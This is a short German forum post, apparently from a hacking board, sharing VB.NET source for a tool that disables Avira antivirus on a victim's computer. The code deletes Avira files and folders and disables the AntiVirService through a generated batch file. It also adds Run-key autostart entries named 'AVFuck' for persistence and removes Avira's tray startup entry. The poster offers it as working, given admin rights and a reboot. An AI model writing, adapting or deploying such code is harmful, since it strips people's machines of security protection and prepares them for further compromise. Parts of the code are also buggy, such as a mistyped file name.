So habe grade mal was geschrieben.
Es sollte spätestens wenn das Opfer Adminrechte hat nach den Neustart klappen.
Code:
Imports System.IO ' wird für den streamwriter benötigt
Public Class Form1
Private Sub Form1_Load(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles MyBase.Load
'versucht die .dlls im avira ordner zu löschen
Try
IO.File.Delete(Environment.SpecialFolder.Programs & "\avira\antivir desktop\" & "\*.dll*")
Application.DoEvents()
Catch ex As Exception
End Try
Try
'Versucht den Ordner Avira zu löschen
IO.Directory.Delete(Environment.SpecialFolder.Programs & "\avira")
Application.DoEvents()
Catch ex As Exception
End Try
'erstellt ne cmd im ordner tmp um den Antirservice zu killen klappt aufjedenfall nach dem neustart des systems
Try
Dim swriter = New StreamWriter(Environ("tmp") & "\avira.cmd")
swriter.WriteLine("@echo off")
swriter.WriteLine("sc.exe config AntiVirService start= disabled")
swriter.Close()
'startet die avira.cmd
Process.Start(Environ("tmp") & "\avira.cm")
Catch ex As Exception
End Try
'macht einen registry eintrag für den autostart der avira.cmd
Try
Dim regpfad As String = "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run"
Dim regname As String = "AVFuck"
Dim filepfad As String = Environ("tmp") & "\avira.cmd"
My.Computer.Registry.SetValue(regpfad, regname, filepfad, _
Microsoft.Win32.RegistryValueKind.String)
Catch ex As Exception
End Try
Try
'Löscht den eintrag für das trayicon von avira
My.Computer.Registry.SetValue("HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run", "avira", "", _
Microsoft.Win32.RegistryValueKind.String)
Catch ex As Exception
End Try
'schreibt einen registry autostart eintrag für die anwendung
Try
Dim regpfaddatei As String = "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run"
Dim regnamedatei As String = "AVFuckstarter"
Dim filepfaddatei As String = Application.ExecutablePath
My.Computer.Registry.SetValue(regpfaddatei, regnamedatei, filepfaddatei, _
Microsoft.Win32.RegistryValueKind.String)
Catch ex As Exception
End Try
End
End Sub
End Class
was der Code macht steht dabei.
mfG